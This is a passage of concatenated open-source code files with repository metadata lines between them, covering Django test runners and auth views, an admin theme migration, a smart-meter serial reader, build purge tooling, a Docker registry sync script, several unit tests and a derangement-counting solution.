return DistrictType.type_abbrevs.get(self.event_district_enum, None)
@property
def event_district_key(self):
district_abbrev = DistrictType.type_abbrevs.get(self.event_district_enum, None)
if district_abbrev is None:
return None
else:
return '{}{}'.format(self.year, district_abbrev)
@property
def event_type_str(self):
return EventType.type_names[self.event_type_enum]
@property
def display_name(self):
return self.name if self.short_name is None else self.short_name
| mit | -7,064,069,696,216,464,000 | 33.00597 | 207 | 0.597876 | false |
kennydude/django-shibboleth-remoteuser | quicktest.py | 1 | 4453 | """
Adapted from LA Times datadesk credit to Ben Welsh.
http://datadesk.latimes.com/posts/2012/06/test-your-django-app-with-travisci/
"""
import os
import sys
import django
from django.conf import settings
class QuickDjangoTest(object):
"""
A quick way to run the Django test suite without a fully-configured project.
Example usage:
>>> QuickDjangoTest('app1', 'app2')
Based on a script published by Lukasz Dziedzia at:
http://stackoverflow.com/questions/3841725/how-to-launch-tests-for-django-reusable-app
"""
DIRNAME = os.path.dirname(__file__)
INSTALLED_APPS = (
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.admin',
)
def __init__(self, *args, **kwargs):
self.apps = args
# Get the version of the test suite
self.version = self.get_test_version()
# Call the appropriate one
if self.version == 'supported':
self._supported_tests()
elif self.version == 'new':
self._new_tests()
else:
self._old_tests()
def get_test_version(self):
"""
Figure out which version of Django's test suite we have to play with.
"""
from django import VERSION
if VERSION[0] == 1 and VERSION[1] >= 2:
if VERSION[1] >= 7:
return 'new'
return 'supported'
else:
return 'old'
def _old_tests(self):
"""
Fire up the Django test suite from before version 1.2
"""
settings.configure(DEBUG = True,
DATABASE_ENGINE = 'sqlite3',
DATABASE_NAME = os.path.join(self.DIRNAME, 'database.db'),
INSTALLED_APPS = self.INSTALLED_APPS + self.apps
)
from django.test.simple import run_tests
failures = run_tests(self.apps, verbosity=1)
if failures:
sys.exit(failures)
def __configure_settings(self):
settings.configure(
DEBUG = True,
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(self.DIRNAME, 'database.db'),
'USER': '',
'PASSWORD': '',
'HOST': '',
'PORT': '',
}
},
INSTALLED_APPS = self.INSTALLED_APPS + self.apps,
MIDDLEWARE_CLASSES = (
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
),
ROOT_URLCONF = 'shib.urls',
)
def _new_tests(self):
"""
Fire up the Django test suite developed for version >= 1.7
"""
from django.test.utils import get_runner
self.__configure_settings()
django.setup()
from django.test.simple import DjangoTestSuiteRunner
failures = DjangoTestSuiteRunner().run_tests(self.apps, verbosity=1)
if failures:
sys.exit(failures)
def _supported_tests(self):
"""
Tests for django 1.2 > version < 1.7
"""
self.__configure_settings()
from django.test.simple import DjangoTestSuiteRunner
failures = DjangoTestSuiteRunner().run_tests(self.apps, verbosity=1)
if failures:
sys.exit(failures)
if __name__ == '__main__':
"""
What do when the user hits this file from the shell.
Example usage:
$ python quicktest.py app1 app2
"""
apps = sys.argv[1:]
QuickDjangoTest(*apps)
| mit | -5,399,791,073,414,517,000 | 32.51938 | 137 | 0.499439 | false |
FabricaSocial/sic | sic/auth/views.py | 1 | 2169 | # -*- coding: utf-8 -*-
from django.template import RequestContext
from django.shortcuts import render_to_response, redirect
from django.views.decorators.csrf import ensure_csrf_cookie
from django.contrib.auth.decorators import login_required
from django.contrib.auth import authenticate, login, logout
from django.core.context_processors import csrf
# Login errors
USUARIO_INATIVO = 1
LOGIN_INVALIDO = 2
def inicio(request):
if request.user.is_authenticated():
return redirect('/home/')
else:
return render_to_response(
'login.html',
context_instance=RequestContext(request)
)
def entrar(request):
usuario = request.POST['usuario']
senha = request.POST['senha']
login_usuario = authenticate(username=usuario, password=senha)
erro_login = None
csrf_token = {}
csrf_token.update(csrf(request))
if login_usuario is not None:
if login_usuario.last_login != login_usuario.date_joined:
if login_usuario.is_active:
login(request, login_usuario)
return redirect('/home/', csrf_token)
else:
erro_login = USUARIO_INATIVO
else:
login(request, login_usuario)
return redirect('/primeiro-login/', csrf_token)
else:
erro_login = LOGIN_INVALIDO
return render_to_response(
'login.html',
{'erro_login': erro_login, 'modal_erro': True},
context_instance=RequestContext(request)
)
@login_required(login_url='/login/')
@ensure_csrf_cookie
def alterar_senha(request):
senha = request.POST['senha']
usuario = request.user
usuario.set_password(senha)
usuario.save()
return render_to_response(
'home.html',
{'sucesso': True},
context_instance=RequestContext(request)
)
@login_required(login_url='/login/')
def sair(request):
logout(request)
return redirect('/')
@login_required(login_url='/login/')
def primeiro_login(request):
return render_to_response(
'home.html', {
'primeiro_login': True, },
context_instance=RequestContext(request)
)
| gpl-2.0 | 5,723,092,688,333,388,000 | 24.821429 | 66 | 0.642692 | false |
fabiocaccamo/django-admin-interface | admin_interface/migrations/0001_initial.py | 1 | 7501 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
import colorfield.fields
class Migration(migrations.Migration):
dependencies = [
]
operations = [
migrations.CreateModel(
name='Theme',
fields=[
('id',
models.AutoField(
verbose_name='ID',
serialize=False,
auto_created=True,
primary_key=True)),
('name',
models.CharField(
default=b'Django',
max_length=50)),
('active',
models.BooleanField(
default=True)),
('title',
models.CharField(
default=b'Django administration',
max_length=50,
blank=True)),
('title_visible',
models.BooleanField(
default=True,
verbose_name=b'visible')),
('logo',
models.FileField(
upload_to=b'admin-interface/logo/',
blank=True)),
('logo_visible',
models.BooleanField(
default=True,
verbose_name=b'visible')),
('css_header_background_color',
colorfield.fields.ColorField(
default=b'#0C4B33',
help_text=b'#0C4B33',
max_length=10,
verbose_name=b'background color',
blank=True)),
('css_header_title_color',
colorfield.fields.ColorField(
default=b'#F5DD5D',
help_text=b'#F5DD5D',
max_length=10,
verbose_name=b'title color',
blank=True)),
('css_header_text_color',
colorfield.fields.ColorField(
default=b'#44B78B',
help_text=b'#44B78B',
max_length=10,
verbose_name=b'text color',
blank=True)),
('css_header_link_color',
colorfield.fields.ColorField(
default=b'#FFFFFF',
help_text=b'#FFFFFF',
max_length=10,
verbose_name=b'link color',
blank=True)),
('css_header_link_hover_color',
colorfield.fields.ColorField(
default=b'#C9F0DD',
help_text=b'#C9F0DD',
max_length=10,
verbose_name=b'link hover color',
blank=True)),
('css_module_background_color',
colorfield.fields.ColorField(
default=b'#44B78B',
help_text=b'#44B78B',
max_length=10,
verbose_name=b'background color',
blank=True)),
('css_module_text_color',
colorfield.fields.ColorField(
default=b'#FFFFFF',
help_text=b'#FFFFFF',
max_length=10,
verbose_name=b'text color',
blank=True)),
('css_module_link_color',
colorfield.fields.ColorField(
default=b'#FFFFFF',
help_text=b'#FFFFFF',
max_length=10,
verbose_name=b'link color',
blank=True)),
('css_module_link_hover_color',
colorfield.fields.ColorField(
default=b'#C9F0DD',
help_text=b'#C9F0DD',
max_length=10,
verbose_name=b'link hover color',
blank=True)),
('css_module_rounded_corners',
models.BooleanField(
default=True,
verbose_name=b'rounded corners')),
('css_generic_link_color',
colorfield.fields.ColorField(
default=b'#0C3C26',
help_text=b'#0C3C26',
max_length=10,
verbose_name=b'link color',
blank=True)),
('css_generic_link_hover_color',
colorfield.fields.ColorField(
default=b'#156641',
help_text=b'#156641',
max_length=10,
verbose_name=b'link hover color',
blank=True)),
('css_save_button_background_color',
colorfield.fields.ColorField(
default=b'#0C4B33',
help_text=b'#0C4B33',
max_length=10,
verbose_name=b'background color',
blank=True)),
('css_save_button_background_hover_color',
colorfield.fields.ColorField(
default=b'#0C3C26',
help_text=b'#0C3C26',
max_length=10,
verbose_name=b'background hover color',
blank=True)),
('css_save_button_text_color',
colorfield.fields.ColorField(
default=b'#FFFFFF',
help_text=b'#FFFFFF',
max_length=10,
verbose_name=b'text color',
blank=True)),
('css_delete_button_background_color',
colorfield.fields.ColorField(
default=b'#BA2121',
help_text=b'#BA2121',
max_length=10,
verbose_name=b'background color',
blank=True)),
('css_delete_button_background_hover_color',
colorfield.fields.ColorField(
default=b'#A41515',
help_text=b'#A41515',
max_length=10,
verbose_name=b'background hover color',
blank=True)),
('css_delete_button_text_color',
colorfield.fields.ColorField(
default=b'#FFFFFF',
help_text=b'#FFFFFF',
max_length=10,
verbose_name=b'text color',
blank=True)),
('css',
models.TextField(
blank=True)),
('list_filter_dropdown',
models.BooleanField(
default=False)),
],
options={
'verbose_name': 'Theme',
'verbose_name_plural': 'Themes',
},
),
]
| mit | -5,121,611,831,423,216,000 | 39.766304 | 63 | 0.383282 | false |
Crossbow78/mbsolget | python/mbsolget_p1_a1.py | 1 | 2056 | #
# MBSolget P1 Telegram Catch
# DSMR 4
#
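# A DSMR P1 telegram is framed by a header line starting with "/" and a
# trailer line starting with "!" (followed by the CRC); the loop below captures
# exactly one complete telegram into the temp log file and then exits.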
version = "v1.00"
import sys
import os
import stat
import serial
import datetime
import locale
###############################################################################################################
# Main program
###############################################################################################################
#Initialize
p1_telegram = False
p1_timestamp = ""
p1_teller = 0
p1_log = True
p1_logfile = os.getenv('WORKDIR', "/home/pi/tmp") + "/p1_temp.log"
#Set COM port config
ser = serial.Serial()
ser.baudrate = 115200
ser.bytesize = serial.EIGHTBITS
ser.parity = serial.PARITY_NONE
ser.stopbits = serial.STOPBITS_ONE
ser.xonxoff = 1
ser.rtscts = 0
ser.timeout = 20
ser.port = os.getenv('P1PORT', "/dev/ttyUSB0")
#Show startup arguments
print ("MBSolget P1 Telegram Catch %s" % version)
print ("Control-C om af te breken")
print ("Poort: (%s)" % (ser.name) )
#Open COM port
try:
ser.open()
except:
sys.exit ("Fout bij het openen van poort %s. " % ser.name)
while p1_log:
p1_line = ''
try:
p1_raw = ser.readline()
except:
ser.close()
sys.exit ("Fout bij het lezen van poort %s. " % ser.name )
    p1_str = str(p1_raw, "utf-8")
p1_line = p1_str.strip()
print (p1_line)
if p1_line[0:1] == "/":
p1_telegram = True
p1_teller = p1_teller + 1
f=open(p1_logfile, "w")
    elif p1_line[0:1] == "!":
        # only finish a telegram that was actually opened with a "/" header
        if p1_telegram:
            p1_teller = 0
            p1_telegram = False
            p1_log = False
            f.write (p1_line)
            f.write ('\r\n')
            f.close()
            os.chmod(p1_logfile, stat.S_IRUSR | stat.S_IWUSR | stat.S_IRGRP | stat.S_IWGRP | stat.S_IROTH | stat.S_IWOTH )
if p1_telegram:
f.write (p1_line)
f.write ('\r\n')
#Close port and show status
try:
ser.close()
except:
sys.exit ("Fout bij het sluiten van %s. Programma afgebroken." % ser.name )
| gpl-3.0 | -3,780,634,384,614,253,600 | 24.7 | 122 | 0.510214 | false |
simar7/build-mozharness | mozharness/mozilla/purge.py | 1 | 5896 | #!/usr/bin/env python
# ***** BEGIN LICENSE BLOCK *****
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this file,
# You can obtain one at http://mozilla.org/MPL/2.0/.
# ***** END LICENSE BLOCK *****
"""Purge/clobber support
"""
# Figure out where our external_tools are
# These are in a sibling directory to the 'mozharness' module
import os
import mozharness
external_tools_path = os.path.join(
os.path.abspath(os.path.dirname(os.path.dirname(mozharness.__file__))),
'external_tools',
)
from mozharness.base.log import ERROR
# PurgeMixin {{{1
# Depends on ScriptMixin for self.run_command,
# and BuildbotMixin for self.buildbot_config and self.query_is_nightly()
class PurgeMixin(object):
purge_tool = os.path.join(external_tools_path, 'purge_builds.py')
clobber_tool = os.path.join(external_tools_path, 'clobberer.py')
default_skips = ['info', 'rel-*', 'tb-rel-*']
default_maxage = 14
default_periodic_clobber = 7 * 24
def purge_builds(self, basedirs=None, min_size=None, skip=None, max_age=None):
# Try clobbering first
c = self.config
dirs = self.query_abs_dirs()
if 'clobberer_url' in c:
self.clobberer()
min_size = min_size or c['purge_minsize']
max_age = max_age or c.get('purge_maxage') or self.default_maxage
skip = skip or c.get('purge_skip') or self.default_skips
if not basedirs:
# some platforms using this method (like linux) supply more than
# one basedir
basedirs = []
basedirs.append(os.path.dirname(dirs['base_work_dir']))
if self.config.get('purge_basedirs'):
basedirs.extend(self.config.get('purge_basedirs'))
cmd = []
if self._is_windows():
# add the python interpreter explicitly
try:
cmd.append(self.query_python_path())
except AttributeError:
# we are not inheriting from VirtualenvMixin
cmd.append(self.query_exe('python'))
# Add --dry-run if you don't want to do this for realz
cmd.extend([self.purge_tool, '-s', str(min_size)])
if max_age:
cmd.extend(['--max-age', str(max_age)])
for s in skip:
cmd.extend(['--not', s])
cmd.extend(basedirs)
# purge_builds.py can also clean up old shared hg repos if we set
# HG_SHARE_BASE_DIR accordingly
env = {'PATH': os.environ.get('PATH')}
share_base = c.get('vcs_share_base', os.environ.get("HG_SHARE_BASE_DIR", None))
if share_base:
env['HG_SHARE_BASE_DIR'] = share_base
retval = self.run_command(cmd, env=env)
if retval != 0:
self.fatal("failed to purge builds", exit_code=2)
def clobberer(self):
c = self.config
dirs = self.query_abs_dirs()
if not self.buildbot_config:
self.fatal("clobberer requires self.buildbot_config (usually from $PROPERTIES_FILE)")
periodic_clobber = c.get('periodic_clobber') or self.default_periodic_clobber
clobberer_url = c['clobberer_url']
builddir = os.path.basename(dirs['base_work_dir'])
branch = self.buildbot_config['properties']['branch']
buildername = self.buildbot_config['properties']['buildername']
slave = self.buildbot_config['properties']['slavename']
master = self.buildbot_config['properties']['master']
cmd = []
if self._is_windows():
# add the python interpreter explicitly
try:
cmd.append(self.query_python_path())
except AttributeError:
# we are not inheriting from VirtualenvMixin
cmd.append(self.query_exe('python'))
# Add --dry-run if you don't want to do this for realz
cmd.extend([self.clobber_tool])
# TODO configurable list
cmd.extend(['-s', 'scripts'])
cmd.extend(['-s', 'logs'])
cmd.extend(['-s', 'buildprops.json'])
cmd.extend(['-s', 'token'])
cmd.extend(['-s', 'oauth.txt'])
if periodic_clobber:
cmd.extend(['-t', str(periodic_clobber)])
cmd.extend([clobberer_url, branch, buildername, builddir, slave, master])
error_list = [{
'substr': 'Error contacting server', 'level': ERROR,
'explanation': 'Error contacting server for clobberer information.'
}]
retval = self.retry(self.run_command, attempts=3, good_statuses=(0,), args=[cmd],
kwargs={'cwd':os.path.dirname(dirs['base_work_dir']),
'error_list':error_list})
if retval != 0:
self.fatal("failed to clobber build", exit_code=2)
def clobber(self, always_clobber_dirs=None):
""" Mozilla clobberer-type clobber.
"""
c = self.config
if c.get('is_automation'):
# Nightly builds always clobber
do_clobber = False
if self.query_is_nightly():
self.info("Clobbering because we're a nightly build")
do_clobber = True
if c.get('force_clobber'):
self.info("Clobbering because our config forced us to")
do_clobber = True
if do_clobber:
super(PurgeMixin, self).clobber()
else:
# Delete the upload dir so we don't upload previous stuff by
# accident
if always_clobber_dirs is None:
always_clobber_dirs = []
for path in always_clobber_dirs:
self.rmtree(path)
# run purge_builds / check clobberer
self.purge_builds()
else:
super(PurgeMixin, self).clobber()
| mpl-2.0 | 3,254,746,533,301,541,400 | 37.535948 | 97 | 0.579715 | false |
qnib/python-docker-reg | test.py | 1 | 7451 | #! /usr/bin/env python
# -*- coding: utf-8 -*-
"""
Usage:
cli.py [options]
cli.py (-h | --help)
cli.py --version
Options:
--local-url <url> URL of local docker-registry (default: $DOCKER_HOST)
--local-port <int> Port of local docker-registry [default: 5000]
--remote-url <url> URL of remote registry.
--remote-port <int> Port of docker-registry [default: 5000]
--dry-run just print images:tags
General Options:
-h --help Show this screen.
--version Show version.
--loglevel, -L=<str> Loglevel [default: WARN]
(ERROR, CRITICAL, WARN, INFO, DEBUG)
--log2stdout, -l Log to stdout, otherwise to logfile. [default: True]
--logfile, -f=<path> Logfile to log to (default: <scriptname>.log)
--cfg, -c=<path> Configuration file.
"""
from ConfigParser import RawConfigParser, NoOptionError
import ast
import codecs
import re
import os
import logging
import sys
from pprint import pprint
import docker_reg
try:
from docopt import docopt
except ImportError:
HAVE_DOCOPT = False
else:
HAVE_DOCOPT = True
__author__ = 'Christian Kniep <[email protected]>'
__license__ = 'Apache License 2.0'
class QnibConfig(RawConfigParser):
""" Class to abstract config and options
"""
specials = {
'TRUE': True,
'FALSE': False,
'NONE': None,
}
def __init__(self, opt):
""" init """
RawConfigParser.__init__(self)
self.logformat = '%(asctime)-15s %(levelname)-5s [%(module)s] %(message)s'
if opt is None:
self._opt = {
"--log2stdout": False,
"--logfile": None,
"--loglevel": "ERROR",
}
else:
self._opt = opt
self.loglevel = opt['--loglevel']
self.logformat = '%(asctime)-15s %(levelname)-5s [%(module)s] %(message)s'
self.log2stdout = opt['--log2stdout']
if self.loglevel is None and opt.get('--cfg') is None:
print "please specify loglevel (-L)"
sys.exit(0)
self.eval_cfg()
self.eval_opt()
self.set_logging()
logging.info("SetUp of QnibConfig is done...")
def do_get(self, section, key, default=None):
""" Also lent from: https://github.com/jpmens/mqttwarn
"""
try:
val = self.get(section, key)
if val.upper() in self.specials:
return self.specials[val.upper()]
return ast.literal_eval(val)
except NoOptionError:
return default
except ValueError: # e.g. %(xxx)s in string
return val
except:
raise
return val
def config(self, section):
''' Convert a whole section's options (except the options specified
explicitly below) into a dict, turning
[config:mqtt]
host = 'localhost'
username = None
list = [1, 'aaa', 'bbb', 4]
into
{u'username': None, u'host': 'localhost', u'list': [1, 'aaa', 'bbb', 4]}
Cannot use config.items() because I want each value to be
retrieved with g() as above
SOURCE: https://github.com/jpmens/mqttwarn
'''
d = None
if self.has_section(section):
d = dict((key, self.do_get(section, key))
for (key) in self.options(section) if key not in ['targets'])
return d
def eval_cfg(self):
""" eval configuration which overrules the defaults
"""
cfg_file = self._opt.get('--cfg')
if cfg_file is not None:
fd = codecs.open(cfg_file, 'r', encoding='utf-8')
self.readfp(fd)
fd.close()
self.__dict__.update(self.config('defaults'))
def eval_opt(self):
""" Updates cfg according to options """
def handle_logfile(val):
""" transforms logfile argument
"""
if val is None:
logf = os.path.splitext(os.path.basename(__file__))[0]
self.logfile = "%s.log" % logf.lower()
else:
self.logfile = val
self._mapping = {
'--logfile': lambda val: handle_logfile(val),
}
for key, val in self._opt.items():
if key in self._mapping:
if isinstance(self._mapping[key], str):
self.__dict__[self._mapping[key]] = val
else:
self._mapping[key](val)
                continue
else:
if val is None:
continue
mat = re.match("\-\-(.*)", key)
if mat:
self.__dict__[mat.group(1)] = val
else:
logging.info("Could not find opt<>cfg mapping for '%s'" % key)
def set_logging(self):
""" sets the logging """
self._logger = logging.getLogger()
self._logger.setLevel(logging.DEBUG)
if self.log2stdout:
hdl = logging.StreamHandler()
hdl.setLevel(self.loglevel)
formatter = logging.Formatter(self.logformat)
hdl.setFormatter(formatter)
self._logger.addHandler(hdl)
else:
hdl = logging.FileHandler(self.logfile)
hdl.setLevel(self.loglevel)
formatter = logging.Formatter(self.logformat)
hdl.setFormatter(formatter)
self._logger.addHandler(hdl)
def __str__(self):
""" print human readble """
ret = []
for key, val in self.__dict__.items():
if not re.match("_.*", key):
ret.append("%-15s: %s" % (key, val))
return "\n".join(ret)
def __getitem__(self, item):
""" return item from opt or __dict__
:param item: key to lookup
:return: value of key
"""
if item in self.__dict__.keys():
return self.__dict__[item]
else:
return self._opt[item]
def main():
""" main function """
options = None
if HAVE_DOCOPT:
options = docopt(__doc__, version='0.0.1')
else:
print "No python-docopt found..."
cfg = QnibConfig(options)
    if cfg['--local-url'] is None:
        local_url = os.environ['DOCKER_HOST'].replace("tcp://", "")
    else:
        local_url = cfg['--local-url']
    if len(local_url.split(":")) > 1:
        local_url = "%s:%s" % (local_url.split(":")[0], cfg['--local-port'])
if cfg['--remote-url'] is None:
print "please specify '--remote-url"
sys.exit(1)
remote_url = "%s:%s" % (cfg['--remote-url'], cfg['--remote-port'])
dreg1 = docker_reg.DockerRegAPI(url=local_url)
dreg1.populate_image_details()
dreg2 = docker_reg.DockerRegAPI(url=remote_url)
dreg2.populate_image_details()
win, lose = dreg1.diff_image_list(dreg2.get_image_details())
print "echo '## pull image from %s and push it to %s...'" % (local_url, remote_url)
for name, tags in win.items():
for tag in tags:
print "echo '%s:%s'" % (name, tag)
dreg1.update_remote_v2_reg(name, tag, remote_url=remote_url)
print "echo 'the remote system has %s images that should be synced as well'" % len(lose)
if __name__ == "__main__":
main()
| apache-2.0 | 7,304,100,943,885,305,000 | 31.537118 | 92 | 0.520064 | false |
divio/askbot-devel | askbot/tests/management_command_tests.py | 1 | 6519 | from django.core import management
from django.contrib import auth
from askbot.tests.utils import AskbotTestCase
from askbot import models
from django.contrib.auth.models import User
class ManagementCommandTests(AskbotTestCase):
def test_add_askbot_user(self):
username = 'test user'
password = 'secretno1'
management.call_command(
'add_askbot_user',
email = '[email protected]',
username = username,
frequency = 'd',
password = password
)
#check that we have the user
users = models.User.objects.filter(username = username)
self.assertEquals(users.count(), 1)
user = users[0]
        #check that subscriptions are correct
subs = models.EmailFeedSetting.objects.filter(
subscriber = user,
)
self.assertEquals(subs.count(), 5)
#try to log in
user = auth.authenticate(username = username, password = password)
self.assertTrue(user is not None)
def test_merge_users(self):
"""Verify a users account can be transfered to another user"""
# Create a new user and add some random related objects
user_one = self.create_user()
question = self.post_question(user=user_one)
comment = self.post_comment(user=user_one, parent_post=question)
number_of_gold = 50
user_one.gold = number_of_gold
reputation = 20
user_one.reputation = reputation
user_one.save()
# Create a second user and transfer all objects from 'user_one' to 'user_two'
user_two = self.create_user(username='unique')
user_two_pk = user_two.pk
management.call_command('merge_users', user_one.id, user_two.id)
# Check that the first user was deleted
self.assertEqual(
models.User.objects.get(pk=user_one.id).status,
'b'
)
# Explicitly check that the values assigned to user_one are now user_two's
self.assertEqual(user_two.posts.get_questions().filter(pk=question.id).count(), 1)
self.assertEqual(user_two.posts.get_comments().filter(pk=comment.id).count(), 1)
user_two = models.User.objects.get(pk=user_two_pk)
self.assertEqual(user_two.gold, number_of_gold)
self.assertEqual(user_two.reputation, reputation)
def test_create_tag_synonym(self):
admin = User.objects.create_superuser('test_admin', '[email protected]', 'admin_pass')
options = {
'from': 'tag1', # ok.. 'from' is a bad keyword argument name..
'to': 'tag2',
'user_id': admin.id,
'is_force': True
}
management.call_command(
'create_tag_synonyms',
**options
)
options['from'] = 'tag3'
options['to'] = 'tag4'
management.call_command(
'create_tag_synonyms',
**options
)
options['from']='tag5'
options['to']='tag4'
management.call_command(
'create_tag_synonyms',
**options
)
options['from']='tag2'
options['to']='tag3'
management.call_command(
'create_tag_synonyms',
**options
)
self.assertEqual(models.TagSynonym.objects.filter(source_tag_name = 'tag1',
target_tag_name = 'tag4'
).count(), 1)
self.assertEqual(models.TagSynonym.objects.filter(source_tag_name = 'tag2',
target_tag_name = 'tag4'
).count(), 1)
self.assertEqual(models.TagSynonym.objects.filter(source_tag_name = 'tag3',
target_tag_name = 'tag4'
).count(), 1)
self.assertEqual(models.TagSynonym.objects.filter(source_tag_name = 'tag5',
target_tag_name = 'tag4'
).count(), 1)
self.assertEqual(models.TagSynonym.objects.count(), 4)
options['from']='tag4'
options['to']='tag6'
management.call_command(
'create_tag_synonyms',
**options
)
self.assertEqual(models.TagSynonym.objects.filter(source_tag_name = 'tag1',
target_tag_name = 'tag6'
).count(), 1)
self.assertEqual(models.TagSynonym.objects.filter(source_tag_name = 'tag2',
target_tag_name = 'tag6'
).count(), 1)
self.assertEqual(models.TagSynonym.objects.filter(source_tag_name = 'tag3',
target_tag_name = 'tag6'
).count(), 1)
self.assertEqual(models.TagSynonym.objects.filter(source_tag_name = 'tag4',
target_tag_name = 'tag6'
).count(), 1)
self.assertEqual(models.TagSynonym.objects.filter(source_tag_name = 'tag5',
target_tag_name = 'tag6'
).count(), 1)
self.assertEqual(models.TagSynonym.objects.count(), 5)
print 'done create_tag_synonym_test'
def test_delete_unused_tags(self):
user = self.create_user()
question = self.post_question(user=user)
tag_count = models.Tag.objects.count()
#create some unused tags
self.create_tag("picasso", user)
self.create_tag("renoir", user)
self.create_tag("pissarro", user)
#check they're in the db
self.assertEqual(models.Tag.objects.count(), tag_count+3)
management.call_command('delete_unused_tags')
#now they should be removed
self.assertEqual(models.Tag.objects.count(), tag_count)
| gpl-3.0 | -6,947,714,562,481,591,000 | 42.172185 | 92 | 0.497162 | false |
rbuffat/pyidf | tests/test_thermalstorageicedetailed.py | 1 | 4659 | import os
import tempfile
import unittest
import logging
from pyidf import ValidationLevel
import pyidf
from pyidf.idf import IDF
from pyidf.water_heaters_and_thermal_storage import ThermalStorageIceDetailed
log = logging.getLogger(__name__)
class TestThermalStorageIceDetailed(unittest.TestCase):
def setUp(self):
self.fd, self.path = tempfile.mkstemp()
def tearDown(self):
os.remove(self.path)
def test_create_thermalstorageicedetailed(self):
pyidf.validation_level = ValidationLevel.error
obj = ThermalStorageIceDetailed()
# alpha
var_name = "Name"
obj.name = var_name
# object-list
var_availability_schedule_name = "object-list|Availability Schedule Name"
obj.availability_schedule_name = var_availability_schedule_name
# real
var_capacity = 3.3
obj.capacity = var_capacity
# node
var_inlet_node_name = "node|Inlet Node Name"
obj.inlet_node_name = var_inlet_node_name
# node
var_outlet_node_name = "node|Outlet Node Name"
obj.outlet_node_name = var_outlet_node_name
# alpha
var_discharging_curve_object_type = "Curve:QuadraticLinear"
obj.discharging_curve_object_type = var_discharging_curve_object_type
# object-list
var_discharging_curve_name = "object-list|Discharging Curve Name"
obj.discharging_curve_name = var_discharging_curve_name
# alpha
var_charging_curve_object_type = "Curve:QuadraticLinear"
obj.charging_curve_object_type = var_charging_curve_object_type
# object-list
var_charging_curve_name = "object-list|Charging Curve Name"
obj.charging_curve_name = var_charging_curve_name
# real
var_timestep_of_the_curve_data = 10.1
obj.timestep_of_the_curve_data = var_timestep_of_the_curve_data
# real
var_parasitic_electric_load_during_discharging = 11.11
obj.parasitic_electric_load_during_discharging = var_parasitic_electric_load_during_discharging
# real
var_parasitic_electric_load_during_charging = 12.12
obj.parasitic_electric_load_during_charging = var_parasitic_electric_load_during_charging
# real
var_tank_loss_coefficient = 13.13
obj.tank_loss_coefficient = var_tank_loss_coefficient
# real
var_freezing_temperature_of_storage_medium = 14.14
obj.freezing_temperature_of_storage_medium = var_freezing_temperature_of_storage_medium
# alpha
var_thaw_process_indicator = "InsideMelt"
obj.thaw_process_indicator = var_thaw_process_indicator
idf = IDF()
idf.add(obj)
idf.save(self.path, check=False)
with open(self.path, mode='r') as f:
for line in f:
log.debug(line.strip())
idf2 = IDF(self.path)
self.assertEqual(idf2.thermalstorageicedetaileds[0].name, var_name)
self.assertEqual(idf2.thermalstorageicedetaileds[0].availability_schedule_name, var_availability_schedule_name)
self.assertAlmostEqual(idf2.thermalstorageicedetaileds[0].capacity, var_capacity)
self.assertEqual(idf2.thermalstorageicedetaileds[0].inlet_node_name, var_inlet_node_name)
self.assertEqual(idf2.thermalstorageicedetaileds[0].outlet_node_name, var_outlet_node_name)
self.assertEqual(idf2.thermalstorageicedetaileds[0].discharging_curve_object_type, var_discharging_curve_object_type)
self.assertEqual(idf2.thermalstorageicedetaileds[0].discharging_curve_name, var_discharging_curve_name)
self.assertEqual(idf2.thermalstorageicedetaileds[0].charging_curve_object_type, var_charging_curve_object_type)
self.assertEqual(idf2.thermalstorageicedetaileds[0].charging_curve_name, var_charging_curve_name)
self.assertAlmostEqual(idf2.thermalstorageicedetaileds[0].timestep_of_the_curve_data, var_timestep_of_the_curve_data)
self.assertAlmostEqual(idf2.thermalstorageicedetaileds[0].parasitic_electric_load_during_discharging, var_parasitic_electric_load_during_discharging)
self.assertAlmostEqual(idf2.thermalstorageicedetaileds[0].parasitic_electric_load_during_charging, var_parasitic_electric_load_during_charging)
self.assertAlmostEqual(idf2.thermalstorageicedetaileds[0].tank_loss_coefficient, var_tank_loss_coefficient)
self.assertAlmostEqual(idf2.thermalstorageicedetaileds[0].freezing_temperature_of_storage_medium, var_freezing_temperature_of_storage_medium)
self.assertEqual(idf2.thermalstorageicedetaileds[0].thaw_process_indicator, var_thaw_process_indicator) | apache-2.0 | 4,151,299,527,143,488,000 | 48.574468 | 157 | 0.711526 | false |
wufangjie/leetcode | 634. Find the Derangement of An Array.py | 1 | 1102 | class Solution(object):
def findDerangement(self, n):
"""
:type n: int
:rtype: int
"""
if n < 2:
return 0
p1, p2 = 1, 2
for i in range(4, n + 1):
if i & 1:
p2 = (i - 1) * (p1 + p2) % 1000000007
else:
p1 = (i - 1) * (p1 + p2) % 1000000007
return p2 if n & 1 else p1
        # # NOTE: building the full dp list is wasteful; only the previous two values are needed
# dp = [0, 0, 1, 2] + [0] * n
# for i in range(4, n + 1):
# dp[i] = (i - 1) * (dp[i - 1] + dp[i - 2]) % 1000000007
# return dp[n]
# # TLE 45/69
# dp = [0, 0, 1, 2] + [0] * n
# for i in range(4, n + 1):
# p = 1
# for j in range(i - 2, 1, -1):
# p = (p % 1000000007) * (j + 1)
# dp[i] += dp[j] * p
# dp[i] = (dp[i] + (p << 1)) % 1000000007
# return dp[n]
print(Solution().findDerangement(4))
assert Solution().findDerangement(100) == 944828409
print(Solution().findDerangement(1999))
| gpl-3.0 | -2,006,659,796,012,118,800 | 27.25641 | 75 | 0.409256 | false |
mediatum/mediatum | schema/test/test_schema.py | 1 | 1951 | # -*- coding: utf-8 -*-
"""
:copyright: (c) 2014 by the mediaTUM authors
:license: GPL3, see COPYING for details
"""
import schema.schema
from core.test.fixtures import editor_user
def test_filter_masks(content_node_with_mdt):
node = content_node_with_mdt
masks = node.metadatatype.filter_masks().all()
assert len(masks) == 4
def test_filter_masks_language(content_node_with_mdt):
node = content_node_with_mdt
masks = node.metadatatype.filter_masks(language="en").all()
# should get only english masks, no language-independent
assert len(masks) == 2
for mask in masks:
assert mask.language == "en"
def test_filter_masks_language_type(content_node_with_mdt):
node = content_node_with_mdt
